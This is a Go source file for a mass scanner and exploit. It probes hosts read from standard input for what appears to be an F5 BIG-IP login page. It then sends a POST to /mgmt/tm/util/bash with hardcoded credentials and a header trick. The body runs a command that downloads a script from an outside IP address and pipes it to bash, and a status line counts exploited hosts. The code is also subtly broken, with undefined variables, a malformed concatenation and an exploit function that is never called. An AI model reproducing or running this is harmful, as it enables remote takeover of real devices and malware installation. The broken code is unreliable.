1

2
//Made by Benshii Varga
3
package main
4

5
import (
6
	"fmt"
7
    "net"
8
    "time"
9
    "bufio"
10
    "os"
11
    "sync"
12
    "strings"
13
    "math/rand"
14
	"strconv"
15
	"net/url"
16
)
17

18
var syncWait sync.WaitGroup
19
var statusExploited, statusAttempted, statusFound int
20
 // replace with your bins
21

22
func zeroByte(a []byte) {
23
    for i := range a {
24
        a[i] = 0
25
    }
26
}
27

28
func sendExploit(target string) {
29

30
	conn, err := net.DialTimeout("tcp", target, timeout * time.Second)
31
    if err != nil {
32
		return
33
    }
34

35
    conn.SetWriteDeadline(time.Now().Add(timeout * time.Second))
36
	conn.Write([]byte("POST /mgmt/tm/util/bash HTTP/1.1\nHost: " + target + "\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0%3B Win64%3B x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\r\nContent-Length: " + strconv.Itoa(len(payload) + 45)"\r\nCache-Control: max-age=0\r\nX-F5-Auth-Token: a\r\nContent-Type: application/json\r\nAuthorization: Basic YWRtaW46aG9yaXpvbjM=\r\nConnection: Keep-Alive, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd, X-F5-New-Authtok-Reqd, X-Forwarded-Server, X-Forwarded-Host\r\n\r\n{'command': 'run', 'utilCmdArgs': '-c \"curl 209.141.41.137/a.sh|bash\"'}\r\n\r\n"))
37
	conn.SetReadDeadline(time.Now().Add(timeout * time.Second))
38

39
	bytebuf := make([]byte, 512)
40
	l, err := conn.Read(bytebuf)
41
	if err != nil || l <= 0 {
42
		conn.Close()
43
	    return
44
	}
45

46
	statusExploited++
47

48
	zeroByte(bytebuf)
49

50
	if isGpon == 0 {
51
		conn.Close()
52
		return
53
	}
54

55
	conn.Close()
56
	return
57
}
58

59
func checkDevice(target string, timeout time.Duration) int {
60

61
	var isGpon int = 0
62

63
	conn, err := net.DialTimeout("tcp", target, timeout * time.Second)
64
    if err != nil {
65
		return -1
66
    }
67

68
    conn.SetWriteDeadline(time.Now().Add(timeout * time.Second))
69
	conn.Write([]byte("GET /tmui/login.jsp HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0%3B Win64%3B x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\r\nSec-Ch-Ua: \"-Not.A/Brand\";v=\"8\", \"Chromium\";v=\"102\"\r\nSec-Ch-Ua-Mobile: ?0\r\nSec-Ch-Ua-Platform: \"macOS\"\r\nUpgrade-Insecure-Requests: 1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nSec-Fetch-Site: none\r\nSec-Fetch-Mode: navigate\r\nSec-Fetch-User: ?1\r\nSec-Fetch-Dest: document\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\r\nConnection: close\r\n\r\n"))
70
	conn.SetReadDeadline(time.Now().Add(timeout * time.Second))
71

72
	bytebuf := make([]byte, 512)
73
	l, err := conn.Read(bytebuf)
74
	if err != nil || l <= 0 {
75
		conn.Close()
76
	    return -1
77
	}
78

79
	if strings.Contains(string(bytebuf), "HTTP/1.1 200 Ok") {
80
		statusFound++
81
		isGpon = 1
82
	}
83
	zeroByte(bytebuf)
84

85
	if isGpon == 0 {
86
		conn.Close()
87
		return -1
88
	}
89

90
	conn.Close()
91
	return 1
92
}
93

94
func processTarget(target string, rtarget string) {
95

96
	defer syncWait.Done()
97

98
	checkDevice(target, 10)
99
}
100

101
func main() {
102

103
	rand.Seed(time.Now().UTC().UnixNano())
104
	var i int = 0
105
    go func() {
106
		for {
107
			fmt.Printf("%d's | Total: %d, Found: %d, Exploited: %d\r\n", i, statusAttempted, statusFound, statusExploited)
108
			time.Sleep(1 * time.Second)
109
			i++
110
		}
111
	}()
112

113
    for {
114
        r := bufio.NewReader(os.Stdin)
115
        scan := bufio.NewScanner(r)
116
        for scan.Scan() {
117
            go processTarget(scan.Text() + ":" + os.Args[1], scan.Text())
118
			statusAttempted++
119
            syncWait.Add(1)
120
        }
121
    }
122
}
123

124